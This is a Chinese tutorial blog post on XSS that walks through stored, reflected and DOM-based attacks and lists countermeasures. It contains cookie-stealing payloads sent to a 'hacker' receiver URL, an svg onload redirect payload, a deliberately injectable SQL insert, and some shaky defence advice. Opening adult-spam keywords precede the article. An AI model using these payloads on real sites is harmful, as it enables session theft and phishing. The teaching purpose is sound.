国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

網(wǎng)絡(luò)安全之XSS漏洞

這篇具有很好參考價(jià)值的文章主要介紹了網(wǎng)絡(luò)安全之XSS漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

一. 引言

Cross-Site Scripting(跨站腳本攻擊)簡(jiǎn)稱XSS,是一種代碼注入攻擊。XSS 攻擊通常指的是利用網(wǎng)頁(yè)的漏洞,攻擊者通過(guò)巧妙的方法注入 XSS 代碼到網(wǎng)頁(yè),因?yàn)闉g覽器無(wú)法分辨哪些腳本是可信的,導(dǎo)致 XSS 腳本被執(zhí)行。XSS 腳本通常能夠竊取用戶數(shù)據(jù)并發(fā)送到攻擊者的網(wǎng)站,或者冒充用戶,調(diào)用目標(biāo)網(wǎng)站接口并執(zhí)行攻擊者指定的操作。

我們需要關(guān)注XSS漏洞,主要是因?yàn)樗赡軐?duì)個(gè)人用戶和企業(yè)網(wǎng)站造成嚴(yán)重影響。首先,XSS攻擊可能導(dǎo)致用戶的個(gè)人信息被盜取,例如反射型XSS攻擊大多數(shù)是用來(lái)盜取用戶的Cookie信息。其次,XSS漏洞也可能影響企業(yè)網(wǎng)站的正常運(yùn)行,甚至成為蠕蟲(chóng)和盜竊cookie的工具。此外,XSS漏洞還可以用于執(zhí)行一些惡意操作,如篡改網(wǎng)頁(yè)內(nèi)容、竊取會(huì)話和cookie等。更重要的是,由于所有的輸入都可能成為XSS漏洞的載體,這使得XSS防護(hù)變得尤為重要。因此,了解并關(guān)注XSS漏洞,對(duì)于保護(hù)個(gè)人隱私和企業(yè)安全有著至關(guān)重要的作用。

二. XSS漏洞的基本概念

跨站腳本攻擊(XSS),是一種網(wǎng)絡(luò)安全漏洞,其實(shí)就是對(duì)用于的數(shù)據(jù)過(guò)濾不到位,它允許攻擊者將惡意代碼注入到其網(wǎng)站中。比如:在博客的內(nèi)容中寫(xiě)入了一些惡意的腳本,但是博客并未對(duì)這些惡意的腳本進(jìn)行處理,當(dāng)其他用戶再次請(qǐng)求查看博客內(nèi)容的時(shí)候,在瀏覽器解析的時(shí)候會(huì)將博客內(nèi)容的惡意腳本誤認(rèn)為是JS或HTML然后進(jìn)行執(zhí)行,這樣就可以做一些惡意的操作,比如盜取該訪客用戶的個(gè)人信息,也可以執(zhí)行一些惡意代碼在服務(wù)器或訪客用戶電腦上,以獲取一些敏感信息。這種攻擊方式能夠使得攻擊者在不同的網(wǎng)站上運(yùn)行,而這種攻擊主要利用的是網(wǎng)頁(yè)編程中的腳本語(yǔ)言,比如JS或HTML。對(duì)于XSS攻擊主要有三種類型,存儲(chǔ)型XSS攻擊、反射型XSS攻擊以及DOM型XSS攻擊接下來(lái)我們針對(duì)這三類分開(kāi)來(lái)說(shuō):

2.1 存儲(chǔ)型XSS攻擊

顧名思義存儲(chǔ)型XSS,也就是XSS代碼被攻擊者存儲(chǔ)到服務(wù)器當(dāng)中,因此一旦有用戶訪問(wèn)含有該存儲(chǔ)型XSS代碼的網(wǎng)站的時(shí)候就會(huì)被攻擊。舉個(gè)例子,比如這個(gè)XSS的攻擊代碼中,將瀏覽者本機(jī)的cookie發(fā)送給hacker,接下來(lái),我們逐步在實(shí)現(xiàn)這樣的一個(gè)攻擊案例

2.1.1 尋找一個(gè)對(duì)寫(xiě)入過(guò)濾不嚴(yán)謹(jǐn)?shù)木W(wǎng)站,或者自己搭建一個(gè)對(duì)參數(shù)過(guò)濾不嚴(yán)格的網(wǎng)站

第一:這個(gè)網(wǎng)站對(duì)輸入?yún)?shù),不做任何過(guò)濾,直接寫(xiě)入數(shù)據(jù)庫(kù),而且寫(xiě)入數(shù)據(jù)庫(kù)不能使用參數(shù)化,需要使用字符串拼接

insert into blog(username,content) values('"+ name +"','" + content+"';

直接這樣,我們的html以及script的一些標(biāo)簽可以直接寫(xiě)入到數(shù)據(jù)庫(kù)
第二:這個(gè)網(wǎng)站在顯示博客數(shù)據(jù)的時(shí)候,未做任何操作,直接向HTML節(jié)點(diǎn)上附加DOM元素
有這樣的先決條件,我們?cè)谶M(jìn)行XSS存儲(chǔ)型攻擊的時(shí)候就非常方便了

2.1.2 搭建一個(gè)接收信息的服務(wù)

這個(gè)服務(wù)器主要是接收從受害者哪里獲取到的敏感信息,比如獲取cookie信息,這個(gè)服務(wù)接收到信息的時(shí)候直接存儲(chǔ)下來(lái),比如存儲(chǔ)到數(shù)據(jù)庫(kù)或文本文件中

http://localhost/CrackTest/xsstest/test?cookie=xxx

這個(gè)服務(wù)是一個(gè)get請(qǐng)求,接收一個(gè)cookie參數(shù)
接下來(lái),我們構(gòu)造payload進(jìn)行攻擊

<script>window.open(\'http://localhost/CrackTest/xsstest/test?cookie=\'+document.cookie)</script>

這個(gè)payload主要含義,就是通過(guò)window.open()函數(shù)遠(yuǎn)程調(diào)用http://localhost/CrackTest/xsstest/test,然后通過(guò)javascript的document.cookie獲取受害者的cookie信息,這樣就可以將受害者的cookie信息發(fā)送到hacker的服務(wù)上了
hacker在寫(xiě)博客的時(shí)候?qū)⑸厦娴膒ayload寫(xiě)入到博客內(nèi)容中,然后就開(kāi)始等待了

2.1.3 受害者無(wú)知的訪問(wèn)了該博客內(nèi)容

受害者不明真相的訪問(wèn)了該博客,引發(fā)上面的payload腳本被執(zhí)行,那么受害者瀏覽器中的cookie信息就被發(fā)送到hacker搭建的服務(wù)上了,也就完成了對(duì)受害者信息的竊取

2.1.4 如何防護(hù)存儲(chǔ)型xss攻擊

1.設(shè)置HttpOnly標(biāo)志,因?yàn)镠ttpOnly標(biāo)志可以有效防止非法用戶通過(guò)javascript讀取cookie,setcookie()的參數(shù),改為setcookie(‘username’,$name,time()+3600,NULL,NULL,NULL,TRUE);setcookie()函數(shù)里面第七個(gè)參數(shù)就是HttpOnly的設(shè)置

2.輸入驗(yàn)證,對(duì)HTML元素和JS元素進(jìn)行驗(yàn)證,在執(zhí)行SQL插入操作的時(shí)候不允許HTML元素和JS元素存儲(chǔ)在數(shù)據(jù)庫(kù)中

3.對(duì)HTML元素渲染進(jìn)行限制,并對(duì)對(duì) HTML 做充分轉(zhuǎn)義,限制輸入框的html或js不允許其執(zhí)行,或限制其執(zhí)行范圍。

4.采用Content Security Policy(CSP)策略,即內(nèi)容安全策略,它用于檢測(cè)并削弱某些特定類型的攻擊,包括夸贊腳本和數(shù)據(jù)注入攻擊等。為使 CSP 可用,你需要配置你的網(wǎng)絡(luò)服務(wù)器返回 Content-Security-Policy HTTP 標(biāo)頭

<meta
  http-equiv="Content-Security-Policy"
  content="default-src 'self'; img-src https://*; child-src 'none';" />

5.使用JavaScript Encryption
主要是對(duì)輸入內(nèi)容進(jìn)行加密,加密的主要原理是破壞原有輸入內(nèi)容的結(jié)構(gòu)導(dǎo)致,最好是選擇不可逆的加密算法,這樣就可以保證輸入的內(nèi)容不可能再次被執(zhí)行
6.HTML實(shí)體編碼
對(duì)HTML實(shí)體進(jìn)行編碼,目的也是為了破壞惡意腳本可執(zhí)行的結(jié)構(gòu)

2.2 反射型XSS攻擊

反射型XSS將用戶輸入的內(nèi)容作為代碼讓瀏覽器執(zhí)行達(dá)到攻擊目的,一般需要讓用戶訪問(wèn)攻擊者構(gòu)造的URL。這種類型的攻擊只發(fā)生在客戶端上,并且需要從帶有惡意腳本參數(shù)的特定URL進(jìn)入,所以也稱為非持久型XSS。
其實(shí)也很常見(jiàn),就比如通過(guò)QQ、郵件系統(tǒng)、短信收到的一些莫名其妙的鏈接,此時(shí)hacker會(huì)將這個(gè)惡意鏈接包裝成“中獎(jiǎng)”、“領(lǐng)取福利”或“某些秘密鏈接”,受害者在好奇心或撿便宜的心態(tài)驅(qū)使下點(diǎn)開(kāi)了這個(gè)鏈接,然后執(zhí)行了連接中隱藏的惡意代碼,然后就將自己電腦或手機(jī)上敏感信息傳送給hacker搭建的服務(wù)。
接下來(lái)我們看看如何搭建一個(gè)反射型XSS攻擊實(shí)例:

2.2.1 hacker搭建一個(gè)服務(wù),用于接收用戶敏感信息

這個(gè)服務(wù)其實(shí)可以和上面的2.1.2類似

2.2.2 hacker偽造一個(gè)帶有惡意代碼的鏈接,然后通過(guò)郵件系統(tǒng)發(fā)送給受害者

首先構(gòu)造一個(gè)惡意的鏈接,這個(gè)鏈接主要是后面的參數(shù),即獲取受害者cookie信息,然后將信息發(fā)送給hacker

http://www.reflect_xss.com/test.html?msg=<script>var+img=document.createElement(“img”);+img.src=”http://localhost/CrackTest/xsstest/test?cookie=%2bescape(document.cookie);+document.appendChild(img)</script>

然后這個(gè)鏈接通過(guò)QQ、短信或郵件的方式發(fā)送給對(duì)方,其實(shí)比較常見(jiàn)是通過(guò)郵件,因?yàn)榭梢源罅堪l(fā)送,成本低,并且有些郵件系統(tǒng)未對(duì)安全做充分認(rèn)證,hacker會(huì)將連接包裝成一個(gè)特別誘人的名字,這樣更能誘導(dǎo)用戶點(diǎn)擊

2.2.3 坐等魚(yú)兒上鉤

hacker只需要不斷的監(jiān)控接收服務(wù)接收到的數(shù)據(jù)即可

2.2.4 如何防護(hù)呢?

1.對(duì)于自建的郵件系統(tǒng),我們要設(shè)置反垃圾郵件的設(shè)置,提高郵箱的安全性
2.加強(qiáng)自我安全認(rèn)識(shí),對(duì)陌生的鏈接或陌生的網(wǎng)站,最好不要亂去訪問(wèn),說(shuō)不定某一個(gè)鏈接后面就有一個(gè)反射XSS攻擊在哪里等著你。

2.3 DOM型XSS攻擊

DOM型的XSS,我認(rèn)為是XSS攻擊類型中最復(fù)雜的,需要一定的前端開(kāi)發(fā)經(jīng)驗(yàn),接下來(lái)我們?cè)敿?xì)了解一下DOM型XSS攻擊。
首先我們要了解什么是DOM,全稱為文檔對(duì)象模型(Document Object Model),主要是Web前端開(kāi)發(fā)中使用到的一種模型。比如:在前端開(kāi)發(fā)中會(huì)使用到很多元素,如< title>、< h1>等,而為了方便使用這些已經(jīng)定義的元素,將這些元素作為結(jié)點(diǎn)排成樹(shù)狀后,通過(guò)遍歷這棵樹(shù),就可以很方便的調(diào)用這些元素。而這顆樹(shù)就稱為DOM樹(shù)。
網(wǎng)絡(luò)安全之XSS漏洞,web安全,xss,安全
接下來(lái)我們通過(guò)一個(gè)實(shí)例來(lái)實(shí)驗(yàn)一下DOM型XSS攻擊:

2.3.1構(gòu)造一個(gè)存在DOM型XSS漏洞html頁(yè)面

首先,我們要構(gòu)造DOM型XSS漏洞,就需要js獲取從url的數(shù)據(jù)并將其傳遞到支持動(dòng)態(tài)代碼執(zhí)行的接收器,就會(huì)存在DOM的XSS漏洞。常見(jiàn)的JS接收器有:

document.write()
document.writeln()
document.domain
someDOMElement.innerHTML
someDOMElement.outerHTML
someDOMElement.insertAdjacentHTML
someDOMElement.onevent

如下HTML即存在DOM型XSS漏洞
網(wǎng)絡(luò)安全之XSS漏洞,web安全,xss,安全
在輸入query參數(shù)之后,參數(shù)就可以在HTML頁(yè)面中顯式
網(wǎng)絡(luò)安全之XSS漏洞,web安全,xss,安全

2.3.2 進(jìn)行XSS漏洞攻擊

我們可以看到輸入的參數(shù)在原先的頁(yè)面HTML元素中被原封不動(dòng)的顯示出來(lái),并未做任何處理。接下來(lái),我們可以考慮使用DOM元素閉合的方式提前結(jié)束img標(biāo)簽,然后新增我們需要增加的HTML元素,就比如:

"><svg onload=alert(1)>

這段輸入的含義是,首先閉合原先的img標(biāo)簽,然后在后面增加了一個(gè)svg的HTML的DOM元素標(biāo)簽,通過(guò)驗(yàn)證我們發(fā)現(xiàn)彈出框已經(jīng)出來(lái)了,按照這個(gè)思路我們可以構(gòu)造一些更加危險(xiǎn)的腳本。接下來(lái)就可以通過(guò)此漏洞構(gòu)造虛假的URL誘使受害用戶點(diǎn)擊以獲得cookie,與之前的反射型或存儲(chǔ)型XSS基本一致。還可以利用window.location.assign(URL)將受害用戶重定向到釣魚(yú)網(wǎng)站。

"><svg οnlοad=window.location.assign("http://www.baidu.com")>

2.3.3 構(gòu)造這樣的頁(yè)面,進(jìn)行釣魚(yú)攻擊

比如在某些Blog系統(tǒng)中,如果對(duì)輸入為做好驗(yàn)證,以及安全防護(hù)不高的情況下,hacker對(duì)某一個(gè)大V的博客進(jìn)行回復(fù),并且回復(fù)內(nèi)容將這種漏洞的payload儲(chǔ)存在評(píng)論中。那么不知名的受害者,訪問(wèn)了這個(gè)大V的博客,輕者被誘導(dǎo)到一個(gè)不知名的網(wǎng)站,重則會(huì)損失跟人信息甚至是金錢(qián)。

2.3.4 防護(hù)DOM型XSS攻擊

則類漏洞,主要還是參考2.1.4防護(hù)方式

2.4 總結(jié)

我們對(duì)XSS漏洞有了一個(gè)整體的認(rèn)識(shí),包括存儲(chǔ)型XSS攻擊、反射型XSS攻擊和DOM型XSS攻擊,其危害性還是比較大。我們只是從原理上風(fēng)向這些XSS漏洞出現(xiàn)的原因,也是為了讓我們?cè)诮ㄔO(shè)軟件的時(shí)候能夠更好的防護(hù)XSS攻擊,以及對(duì)自我的安全教育,不要對(duì)那些未知的不知名的網(wǎng)站劫持了cookie里面敏感的信息。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-738791.html

到了這里,關(guān)于網(wǎng)絡(luò)安全之XSS漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【網(wǎng)絡(luò)安全 --- xss-labs靶場(chǎng)通關(guān)(1-10關(guān))】詳細(xì)的xss-labs靶場(chǎng)通關(guān)思路及技巧講解,讓你對(duì)xss漏洞的理解更深刻

    【網(wǎng)絡(luò)安全 --- xss-labs靶場(chǎng)通關(guān)(1-10關(guān))】詳細(xì)的xss-labs靶場(chǎng)通關(guān)思路及技巧講解,讓你對(duì)xss漏洞的理解更深刻

    靶場(chǎng)安裝請(qǐng)參考以下博客,既詳細(xì)有提供工具: 【網(wǎng)絡(luò)安全 --- xss-labs靶場(chǎng)】xss-labs靶場(chǎng)安裝詳細(xì)教程,讓你鞏固對(duì)xss漏洞的理解及繞過(guò)技巧和方法(提供資源)-CSDN博客 【網(wǎng)絡(luò)安全 --- xss-labs通關(guān)】xss-labs靶場(chǎng)通關(guān),讓你鞏固對(duì)xss漏洞的理解及繞過(guò)技巧和方法(提供資源) h

    2024年02月08日
    瀏覽(23)
  • Web安全測(cè)試(五):XSS攻擊—存儲(chǔ)式XSS漏洞

    Web安全測(cè)試(五):XSS攻擊—存儲(chǔ)式XSS漏洞

    結(jié)合內(nèi)部資料,與安全滲透部門(mén)同事合力整理的安全測(cè)試相關(guān)資料教程,全方位涵蓋電商、支付、金融、網(wǎng)絡(luò)、數(shù)據(jù)庫(kù)等領(lǐng)域的安全測(cè)試,覆蓋Web、APP、中間件、內(nèi)外網(wǎng)、Linux、Windows多個(gè)平臺(tái)。學(xué)完后一定能成為安全大佬! 全部文章請(qǐng)?jiān)L問(wèn)專欄: 《全棧安全測(cè)試教程(0基礎(chǔ)

    2024年02月10日
    瀏覽(22)
  • 網(wǎng)絡(luò)安全——XSS跨站腳本攻擊

    網(wǎng)絡(luò)安全——XSS跨站腳本攻擊

    一、XSS概述 1、XSS被稱為跨站腳本攻擊,由于和CSS重名,所以改為XSS; 2、XSS主要基于JavaScript語(yǔ)言完成惡意的攻擊行為,因?yàn)镴avaScript可以非常靈活的操作html、CSS和瀏覽器 3、原理: XSS就是通過(guò)利用網(wǎng)頁(yè)開(kāi)發(fā)時(shí)留下的漏洞(由于Web應(yīng)用程序?qū)τ脩舻妮斎脒^(guò)濾不足),巧妙的將惡

    2024年02月16日
    瀏覽(24)
  • 【網(wǎng)絡(luò)安全】跨站腳本(xss)攻擊

    【網(wǎng)絡(luò)安全】跨站腳本(xss)攻擊

    跨站點(diǎn)腳本(也稱為 XSS)是一種 Web 安全漏洞,允許攻擊者破壞用戶與易受攻擊的應(yīng)用程序的交互。它允許攻擊者繞過(guò)同源策略,該策略旨在將不同的網(wǎng)站彼此隔離。跨站點(diǎn)腳本漏洞通常允許攻擊者偽裝成受害者用戶,執(zhí)行用戶能夠執(zhí)行的任何操作,并訪問(wèn)用戶的任何數(shù)據(jù)。

    2024年02月11日
    瀏覽(22)
  • 【網(wǎng)絡(luò)安全】跨站腳本攻擊(XSS)

    【網(wǎng)絡(luò)安全】跨站腳本攻擊(XSS)

    專欄文章索引:網(wǎng)絡(luò)安全 有問(wèn)題可私聊:QQ:3375119339 目錄 一、XSS簡(jiǎn)介 二、XSS漏洞危害 三、XSS漏洞類型 1.反射型XSS 2.存儲(chǔ)型XSS 3.DOM型XSS 四、XSS漏洞防御 XSS(Cross-Site Scripting) XSS 被稱為跨站腳本攻擊,由于和CSS重名,所以改為XSS。 XSS 主要使用 javascript , javascript 可以非常靈

    2024年04月28日
    瀏覽(20)
  • web安全學(xué)習(xí)日志---xss漏洞(跨站腳本攻擊)

    web安全學(xué)習(xí)日志---xss漏洞(跨站腳本攻擊)

    ? 僅執(zhí)行一次,非持久型。主要存在于攻擊者將惡意腳本附加到url的參數(shù)中,發(fā)送給受害者,服務(wù)端未經(jīng)嚴(yán)格過(guò)濾處理而輸出在用戶瀏覽器中,導(dǎo)致瀏覽器執(zhí)行代碼數(shù)據(jù)。 利用場(chǎng)景: 直接插入JS代碼,修改url參數(shù) ?? 攻 scriptalert(\\\'hack\\\')/script 防 $name=str_replace(\\\'script\\\', \\\'? \\\',$name

    2024年02月13日
    瀏覽(93)
  • 【安全測(cè)試】Web應(yīng)用安全之XSS跨站腳本攻擊漏洞

    【安全測(cè)試】Web應(yīng)用安全之XSS跨站腳本攻擊漏洞

    目錄 前言 XSS概念及分類 反射型XSS(非持久性XSS) 存儲(chǔ)型XSS(持久型XSS) 如何測(cè)試XSS漏洞 方法一: 方法二: XSS漏洞修復(fù) 原則:不相信客戶輸入的數(shù)據(jù) 處理建議 資料獲取方法 以前都只是在各類文檔中見(jiàn)到過(guò)XSS,也進(jìn)行過(guò)相關(guān)的學(xué)習(xí),但是都是一知半解,過(guò)了一段時(shí)間就忘了。

    2024年02月14日
    瀏覽(23)
  • WEB安全之XSS漏洞與SQL注入漏洞介紹及解決方案

    這篇文章把Xss跨站攻擊和sql注入的相關(guān)知識(shí)整理了下,比較適合初學(xué)者觀看。 對(duì)于防止sql注入發(fā)生,我在這里用簡(jiǎn)單拼接字符串的注入及參數(shù)化查詢,如果大家對(duì)這個(gè)系列的內(nèi)容感興趣,可以在評(píng)論區(qū)告訴我! XSS又叫CSS (Cross Site Script) ,跨站腳本攻擊。它指的是惡意攻擊者

    2024年02月07日
    瀏覽(23)
  • 網(wǎng)絡(luò)安全進(jìn)階學(xué)習(xí)第二課——XSS跨站腳本攻擊

    首先了解什么是前端。前端從定義上來(lái)講是指一個(gè)網(wǎng)站的前臺(tái)部分,是展示給用戶看的部分。它不需要關(guān)注任何業(yè)務(wù)之間的邏輯處理,只需要安安靜靜地做好自己,老老實(shí)實(shí)的把自己最美的一面展示給用戶。 Cookie 是在 HTTP 協(xié)議下,服務(wù)器或腳本可以維護(hù)客戶工作站上信息的

    2024年02月11日
    瀏覽(24)
  • [網(wǎng)絡(luò)安全]xss-labs 本地靶場(chǎng)搭建詳細(xì)教程

    [網(wǎng)絡(luò)安全]xss-labs 本地靶場(chǎng)搭建詳細(xì)教程

    本文以phpstudy搭建xss-labs本地靶場(chǎng)環(huán)境 PhpStudy是一個(gè)PHP調(diào)試環(huán)境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安裝后無(wú)須配置即可使用。 官網(wǎng)安裝地址: PhpStudy Download 鏈接 安裝完成后打開(kāi)PhpStudy 網(wǎng)站配置如下: xss-labs 靶機(jī)下載地址: https://github.com/do0d

    2024年02月08日
    瀏覽(27)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包